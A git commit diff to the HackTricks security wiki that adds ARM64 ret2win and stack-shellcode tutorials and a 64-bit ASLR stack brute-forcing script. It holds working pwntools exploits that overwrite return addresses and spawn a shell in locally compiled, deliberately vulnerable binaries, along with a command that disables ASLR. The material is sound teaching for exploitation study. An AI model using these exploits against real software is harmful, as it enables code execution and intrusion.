GITBOOK-4305: No subject
BIN
.gitbook/assets/image (1202).png
Normal file
After Width: | Height: | Size: 599 KiB |
BIN
.gitbook/assets/image (1203).png
Normal file
After Width: | Height: | Size: 248 KiB |
BIN
.gitbook/assets/image (1204).png
Normal file
After Width: | Height: | Size: 220 KiB |
BIN
.gitbook/assets/image (1205).png
Normal file
After Width: | Height: | Size: 131 KiB |
BIN
.gitbook/assets/image (1206).png
Normal file
After Width: | Height: | Size: 124 KiB |
BIN
.gitbook/assets/image (1207).png
Normal file
After Width: | Height: | Size: 29 KiB |
BIN
.gitbook/assets/image (1208).png
Normal file
After Width: | Height: | Size: 94 KiB |
BIN
.gitbook/assets/image (1209).png
Normal file
After Width: | Height: | Size: 96 KiB |
BIN
.gitbook/assets/image (1210).png
Normal file
After Width: | Height: | Size: 238 KiB |
BIN
.gitbook/assets/image (1211).png
Normal file
After Width: | Height: | Size: 218 KiB |
|
@ -112,7 +112,7 @@ You can **create a free account** [**here**](https://serpapi.com/users/sign\_up)
|
||||||
|
|
||||||
### [WebSec](https://websec.nl/)
|
### [WebSec](https://websec.nl/)
|
||||||
|
|
||||||
<figure><img src=".gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
<figure><img src=".gitbook/assets/websec (1).svg" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach.
|
[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach.
|
||||||
|
|
||||||
|
@ -122,7 +122,7 @@ Another cool thing about WebSec is that unlike the industry average WebSec is **
|
||||||
|
|
||||||
In addition to the above WebSec is also a **committed supporter of HackTricks.**
|
In addition to the above WebSec is also a **committed supporter of HackTricks.**
|
||||||
|
|
||||||
<figure><img src=".gitbook/assets/websec (1).svg" alt=""><figcaption></figcaption></figure>
|
{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}
|
||||||
|
|
||||||
## License & Disclaimer
|
## License & Disclaimer
|
||||||
|
|
||||||
|
|
|
@ -689,10 +689,12 @@
|
||||||
* [Exploiting Tools](binary-exploitation/basic-binary-exploitation-methodology/tools/README.md)
|
* [Exploiting Tools](binary-exploitation/basic-binary-exploitation-methodology/tools/README.md)
|
||||||
* [PwnTools](binary-exploitation/basic-binary-exploitation-methodology/tools/pwntools.md)
|
* [PwnTools](binary-exploitation/basic-binary-exploitation-methodology/tools/pwntools.md)
|
||||||
* [Stack Overflow](binary-exploitation/stack-overflow/README.md)
|
* [Stack Overflow](binary-exploitation/stack-overflow/README.md)
|
||||||
* [Stack Shellcode](binary-exploitation/stack-overflow/stack-shellcode.md)
|
|
||||||
* [Stack Pivoting - EBP2Ret - EBP chaining](binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md)
|
|
||||||
* [Pointer Redirecting](binary-exploitation/stack-overflow/pointer-redirecting.md)
|
* [Pointer Redirecting](binary-exploitation/stack-overflow/pointer-redirecting.md)
|
||||||
* [Ret2win](binary-exploitation/stack-overflow/ret2win.md)
|
* [Ret2win](binary-exploitation/stack-overflow/ret2win/README.md)
|
||||||
|
* [Ret2win - arm64](binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md)
|
||||||
|
* [Stack Shellcode](binary-exploitation/stack-overflow/stack-shellcode/README.md)
|
||||||
|
* [Stack Shellcode - arm64](binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md)
|
||||||
|
* [Stack Pivoting - EBP2Ret - EBP chaining](binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md)
|
||||||
* [Uninitialized Variables](binary-exploitation/stack-overflow/uninitialized-variables.md)
|
* [Uninitialized Variables](binary-exploitation/stack-overflow/uninitialized-variables.md)
|
||||||
* [ROP - Return Oriented Programing](binary-exploitation/rop-return-oriented-programing/README.md)
|
* [ROP - Return Oriented Programing](binary-exploitation/rop-return-oriented-programing/README.md)
|
||||||
* [Ret2csu](binary-exploitation/rop-return-oriented-programing/ret2csu.md)
|
* [Ret2csu](binary-exploitation/rop-return-oriented-programing/ret2csu.md)
|
||||||
|
|
|
@ -98,9 +98,80 @@ for off in range(0xb7000000, 0xb8000000, 0x1000):
|
||||||
* If attacking a remote server, you could try to **brute-force the address of the `libc` function `usleep`**, passing as argument 10 (for example). If at some point the **server takes 10s extra to respond**, you found the address of this function.
|
* If attacking a remote server, you could try to **brute-force the address of the `libc` function `usleep`**, passing as argument 10 (for example). If at some point the **server takes 10s extra to respond**, you found the address of this function.
|
||||||
|
|
||||||
{% hint style="success" %}
|
{% hint style="success" %}
|
||||||
In 64bit systems the entropy is much higher and this isn't possible.
|
In 64bit systems the entropy is much higher and this shouldn't possible.
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
|
### 64 bits stack brute-forcing
|
||||||
|
|
||||||
|
It's possible to occupy a big part of the stack with env variables and then try to abuse the binary hundreds/thousands of times locally to exploit it.\
|
||||||
|
The following code shows how it's possible to **just select an address in the stack** and every **few hundreds of executions** that address will contain the **NOP instruction**:
|
||||||
|
|
||||||
|
```c
|
||||||
|
//clang -o aslr-testing aslr-testing.c -fno-stack-protector -Wno-format-security -no-pie
|
||||||
|
#include <stdio.h>
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
unsigned long long address = 0xffffff1e7e38;
|
||||||
|
unsigned int* ptr = (unsigned int*)address;
|
||||||
|
unsigned int value = *ptr;
|
||||||
|
printf("The 4 bytes from address 0xffffff1e7e38: 0x%x\n", value);
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
```python
|
||||||
|
import subprocess
|
||||||
|
import traceback
|
||||||
|
|
||||||
|
# Start the process
|
||||||
|
nop = b"\xD5\x1F\x20\x03" # ARM64 NOP transposed
|
||||||
|
n_nops = int(128000/4)
|
||||||
|
shellcode_env_var = nop * n_nops
|
||||||
|
|
||||||
|
# Define the environment variables you want to set
|
||||||
|
env_vars = {
|
||||||
|
'a': shellcode_env_var,
|
||||||
|
'b': shellcode_env_var,
|
||||||
|
'c': shellcode_env_var,
|
||||||
|
'd': shellcode_env_var,
|
||||||
|
'e': shellcode_env_var,
|
||||||
|
'f': shellcode_env_var,
|
||||||
|
'g': shellcode_env_var,
|
||||||
|
'h': shellcode_env_var,
|
||||||
|
'i': shellcode_env_var,
|
||||||
|
'j': shellcode_env_var,
|
||||||
|
'k': shellcode_env_var,
|
||||||
|
'l': shellcode_env_var,
|
||||||
|
'm': shellcode_env_var,
|
||||||
|
'n': shellcode_env_var,
|
||||||
|
'o': shellcode_env_var,
|
||||||
|
'p': shellcode_env_var,
|
||||||
|
}
|
||||||
|
|
||||||
|
cont = 0
|
||||||
|
while True:
|
||||||
|
cont += 1
|
||||||
|
|
||||||
|
if cont % 10000 == 0:
|
||||||
|
break
|
||||||
|
|
||||||
|
print(cont, end="\r")
|
||||||
|
# Define the path to your binary
|
||||||
|
binary_path = './aslr-testing'
|
||||||
|
|
||||||
|
try:
|
||||||
|
process = subprocess.Popen(binary_path, env=env_vars, stdout=subprocess.PIPE, text=True)
|
||||||
|
output = process.communicate()[0]
|
||||||
|
if "0xd5" in str(output):
|
||||||
|
print(str(cont) + " -> " + output)
|
||||||
|
except Exception as e:
|
||||||
|
print(e)
|
||||||
|
print(traceback.format_exc())
|
||||||
|
pass
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1211).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
### Local Information (`/proc/[pid]/stat`)
|
### Local Information (`/proc/[pid]/stat`)
|
||||||
|
|
||||||
The file **`/proc/[pid]/stat`** of a process is always readable by everyone and it **contains interesting** information such as:
|
The file **`/proc/[pid]/stat`** of a process is always readable by everyone and it **contains interesting** information such as:
|
||||||
|
|
|
@ -28,7 +28,7 @@ In order to prepare the call for the **syscall** it's needed the following confi
|
||||||
So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack). For this, we need a gadget to write `/bin/sh` in a known area.
|
So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack). For this, we need a gadget to write `/bin/sh` in a known area.
|
||||||
|
|
||||||
{% hint style="success" %}
|
{% hint style="success" %}
|
||||||
Another interesting syscall to call is **`mprotect`** which would allow an attacker to **modify the permissions of a page in memory**. This can be combined with [**ret2shellcode**](../stack-overflow/stack-shellcode.md).
|
Another interesting syscall to call is **`mprotect`** which would allow an attacker to **modify the permissions of a page in memory**. This can be combined with [**ret2shellcode**](../stack-overflow/stack-shellcode/).
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
## Register gadgets
|
## Register gadgets
|
||||||
|
|
|
@ -77,16 +77,16 @@ However, in other scenarios maybe just **overwriting some variables values in th
|
||||||
|
|
||||||
In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/) would be disabled) so when the vulnerable function returns, the hidden function will be called:
|
In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/) would be disabled) so when the vulnerable function returns, the hidden function will be called:
|
||||||
|
|
||||||
{% content-ref url="ret2win.md" %}
|
{% content-ref url="ret2win/" %}
|
||||||
[ret2win.md](ret2win.md)
|
[ret2win](ret2win/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### Stack Shellcode
|
### Stack Shellcode
|
||||||
|
|
||||||
In this scenario the attacker could place a shellcode in the stack and abuse the controlled EIP/RIP to jump to the shellcode and execute arbitrary code:
|
In this scenario the attacker could place a shellcode in the stack and abuse the controlled EIP/RIP to jump to the shellcode and execute arbitrary code:
|
||||||
|
|
||||||
{% content-ref url="stack-shellcode.md" %}
|
{% content-ref url="stack-shellcode/" %}
|
||||||
[stack-shellcode.md](stack-shellcode.md)
|
[stack-shellcode](stack-shellcode/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### ROP & Ret2... techniques
|
### ROP & Ret2... techniques
|
||||||
|
|
|
@ -89,8 +89,8 @@ The Python script sends a carefully crafted message that, when processed by the
|
||||||
|
|
||||||
## Protections
|
## Protections
|
||||||
|
|
||||||
* [**PIE**](../common-binary-protections-and-bypasses/pie/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. In some cases, when the function that causes the overflow is `read` or similar, you can do a **Partial Overwrite** of 1 or 2 bytes to change the return address to be the win function. Because of how ASLR works, the last three hex nibbles are not randomized, so there is a **1/16 chance** (1 nibble) to get the correct return address.
|
* [**PIE**](../../common-binary-protections-and-bypasses/pie/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. In some cases, when the function that causes the overflow is `read` or similar, you can do a **Partial Overwrite** of 1 or 2 bytes to change the return address to be the win function. Because of how ASLR works, the last three hex nibbles are not randomized, so there is a **1/16 chance** (1 nibble) to get the correct return address.
|
||||||
* [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
|
* [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
|
||||||
|
|
||||||
## Other examples & References
|
## Other examples & References
|
||||||
|
|
||||||
|
@ -114,6 +114,12 @@ The Python script sends a carefully crafted message that, when processed by the
|
||||||
* [https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/](https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/)
|
* [https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/](https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/)
|
||||||
* 64 bit, relro, no canary, nx, pie. Partial overwrite to call the win function (ret2win)
|
* 64 bit, relro, no canary, nx, pie. Partial overwrite to call the win function (ret2win)
|
||||||
|
|
||||||
|
## ARM64 Example
|
||||||
|
|
||||||
|
{% content-ref url="ret2win-arm64.md" %}
|
||||||
|
[ret2win-arm64.md](ret2win-arm64.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
212
binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md
Normal file
|
@ -0,0 +1,212 @@
|
||||||
|
# Ret2win - arm64
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
Find an introduction to arm64 in:
|
||||||
|
|
||||||
|
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
|
||||||
|
[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
## Code 
|
||||||
|
|
||||||
|
```c
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
|
||||||
|
void win() {
|
||||||
|
printf("Congratulations!\n");
|
||||||
|
}
|
||||||
|
|
||||||
|
void vulnerable_function() {
|
||||||
|
char buffer[64];
|
||||||
|
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
vulnerable_function();
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
Compile without pie and canary:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie
|
||||||
|
```
|
||||||
|
|
||||||
|
## Finding the offset
|
||||||
|
|
||||||
|
### Pattern option
|
||||||
|
|
||||||
|
This example was created using [**GEF**](https://github.com/bata24/gef):
|
||||||
|
|
||||||
|
Stat gdb with gef, create pattern and use it:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
gdb -q ./ret2win
|
||||||
|
pattern create 200
|
||||||
|
run
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1202).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
arm64 will try to return to the address in the register x30 (which was compromised), we can use that to find the pattern offset:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
pattern search $x30
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1203).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
**The offset is 72 (9x48).**
|
||||||
|
|
||||||
|
### Stack offset option
|
||||||
|
|
||||||
|
Start by getting the stack address where the pc register is stored:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
gdb -q ./ret2win
|
||||||
|
b *vulnerable_function + 0xc
|
||||||
|
run
|
||||||
|
info frame
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1204).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Now set a breakpoint after the `read()` and continue until the `read()` is executed and set a pattern such as 13371337:
|
||||||
|
|
||||||
|
```
|
||||||
|
b *vulnerable_function+28
|
||||||
|
c
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1205).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Find where this pattern is stored in memory:
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1206).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Then: **`0xfffffffff148 - 0xfffffffff100 = 0x48 = 72`**
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1207).png" alt="" width="339"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
## No PIE
|
||||||
|
|
||||||
|
### Regular
|
||||||
|
|
||||||
|
Get the address of the **`win`** function:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
objdump -d ret2win | grep win
|
||||||
|
ret2win: file format elf64-littleaarch64
|
||||||
|
00000000004006c4 <win>:
|
||||||
|
```
|
||||||
|
|
||||||
|
Exploit:
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
# Configuration
|
||||||
|
binary_name = './ret2win'
|
||||||
|
p = process(binary_name)
|
||||||
|
|
||||||
|
# Prepare the payload
|
||||||
|
offset = 72
|
||||||
|
ret2win_addr = p64(0x00000000004006c4)
|
||||||
|
payload = b'A' * offset + ret2win_addr
|
||||||
|
|
||||||
|
# Send the payload
|
||||||
|
p.send(payload)
|
||||||
|
|
||||||
|
# Check response
|
||||||
|
print(p.recvline())
|
||||||
|
p.close()
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1208).png" alt="" width="375"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
### Off-by-2
|
||||||
|
|
||||||
|
Instead of overwritting all the return address we are going to overwrite **only the last 2 bytes** with `0x06c4`.
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
# Configuration
|
||||||
|
binary_name = './ret2win'
|
||||||
|
p = process(binary_name)
|
||||||
|
|
||||||
|
# Prepare the payload
|
||||||
|
offset = 72
|
||||||
|
ret2win_addr = p16(0x06c4)
|
||||||
|
payload = b'A' * offset + ret2win_addr
|
||||||
|
|
||||||
|
# Send the payload
|
||||||
|
p.send(payload)
|
||||||
|
|
||||||
|
# Check response
|
||||||
|
print(p.recvline())
|
||||||
|
p.close()
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1209).png" alt="" width="375"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
## With PIE
|
||||||
|
|
||||||
|
{% hint style="success" %}
|
||||||
|
Compile the binary **without the `-no-pie` argument**
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
### Off-by-2
|
||||||
|
|
||||||
|
Without a leak we don't know the exact address of the winning function but we can know the offset of the function from the binary and knowing that the return address we are overwriting is already pointing to a close address, it's possible to leak the offset to the win function (**0x7d4**) in this case and just use that offset:
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1210).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
# Configuration
|
||||||
|
binary_name = './ret2win'
|
||||||
|
p = process(binary_name)
|
||||||
|
|
||||||
|
# Prepare the payload
|
||||||
|
offset = 72
|
||||||
|
ret2win_addr = p16(0x07d4)
|
||||||
|
payload = b'A' * offset + ret2win_addr
|
||||||
|
|
||||||
|
# Send the payload
|
||||||
|
p.send(payload)
|
||||||
|
|
||||||
|
# Check response
|
||||||
|
print(p.recvline())
|
||||||
|
p.close()
|
||||||
|
```
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
|
@ -214,6 +214,12 @@ Check the ret2esp technique here:
|
||||||
* [https://guyinatuxedo.github.io/17-stack\_pivot/insomnihack18\_onewrite/index.html](https://guyinatuxedo.github.io/17-stack\_pivot/insomnihack18\_onewrite/index.html)
|
* [https://guyinatuxedo.github.io/17-stack\_pivot/insomnihack18\_onewrite/index.html](https://guyinatuxedo.github.io/17-stack\_pivot/insomnihack18\_onewrite/index.html)
|
||||||
* 64 bit, no relro, canary, nx and pie. The program grants a leak for stack or pie and a WWW of a qword. First get the stack leak and use the WWW to go back and get the pie leak. Then use the WWW to create an eternal loop abusing `.fini_array` entries + calling `__libc_csu_fini` ([more info here](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini\_array.md)). Abusing this "eternal" write, it's written a ROP chain in the .bss and end up calling it pivoting with RBP.
|
* 64 bit, no relro, canary, nx and pie. The program grants a leak for stack or pie and a WWW of a qword. First get the stack leak and use the WWW to go back and get the pie leak. Then use the WWW to create an eternal loop abusing `.fini_array` entries + calling `__libc_csu_fini` ([more info here](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini\_array.md)). Abusing this "eternal" write, it's written a ROP chain in the .bss and end up calling it pivoting with RBP.
|
||||||
|
|
||||||
|
## ARM64
|
||||||
|
|
||||||
|
In ARM64, the **prologue and epilogues** of the functions **don't store and retrieve the SP registry** in the stack. Therefore, by default, you **won't be able to control the SP registry** by overwriting some data inside the stack.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -90,9 +90,9 @@ The **NOP slide** (`asm('nop')`) is used to increase the chance that execution w
|
||||||
|
|
||||||
## Protections
|
## Protections
|
||||||
|
|
||||||
* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded.
|
* [**ASLR**](../../common-binary-protections-and-bypasses/aslr/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded.
|
||||||
* [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
|
* [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
|
||||||
* [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** protection would prevent the execution of the shellcode inside the stack because that region won't be executable.
|
* [**NX**](../../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** protection would prevent the execution of the shellcode inside the stack because that region won't be executable.
|
||||||
|
|
||||||
## Other Examples & References
|
## Other Examples & References
|
||||||
|
|
|
@ -0,0 +1,107 @@
|
||||||
|
# Stack Shellcode - arm64
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
Find an introduction to arm64 in:
|
||||||
|
|
||||||
|
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
|
||||||
|
[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
## Code 
|
||||||
|
|
||||||
|
```c
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
|
||||||
|
void vulnerable_function() {
|
||||||
|
char buffer[64];
|
||||||
|
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
vulnerable_function();
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
Compile without pie, canary and nx:
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```bash
|
||||||
|
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
## No ASLR & No canary - Stack Overflow 
|
||||||
|
|
||||||
|
To stop ASLR execute:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
|
||||||
|
```
|
||||||
|
|
||||||
|
To get the [**offset of the bof check this link**](../ret2win/ret2win-arm64.md#finding-the-offset).
|
||||||
|
|
||||||
|
Exploit:
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
# Load the binary
|
||||||
|
binary_name = './bof'
|
||||||
|
elf = context.binary = ELF(binary_name)
|
||||||
|
|
||||||
|
# Generate shellcode
|
||||||
|
shellcode = asm(shellcraft.sh())
|
||||||
|
|
||||||
|
# Start the process
|
||||||
|
p = process(binary_name)
|
||||||
|
|
||||||
|
# Offset to return address
|
||||||
|
offset = 72
|
||||||
|
|
||||||
|
# Address in the stack after the return address
|
||||||
|
ret_address = p64(0xfffffffff1a0)
|
||||||
|
|
||||||
|
# Craft the payload
|
||||||
|
payload = b'A' * offset + ret_address + shellcode
|
||||||
|
|
||||||
|
print("Payload length: "+ str(len(payload)))
|
||||||
|
|
||||||
|
# Send the payload
|
||||||
|
p.send(payload)
|
||||||
|
|
||||||
|
# Drop to an interactive session
|
||||||
|
p.interactive()
|
||||||
|
```
|
||||||
|
|
||||||
|
The only "complicated" thing to find here would be the address in the stack to call. In my case I generated the exploit with the address found using gdb, but then when exploiting it it didn't work (because the stack address changed a bit).
|
||||||
|
|
||||||
|
I opened the generated **`core` file** (`gdb ./bog ./core`) and checked the real address of the start of the shellcode.
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
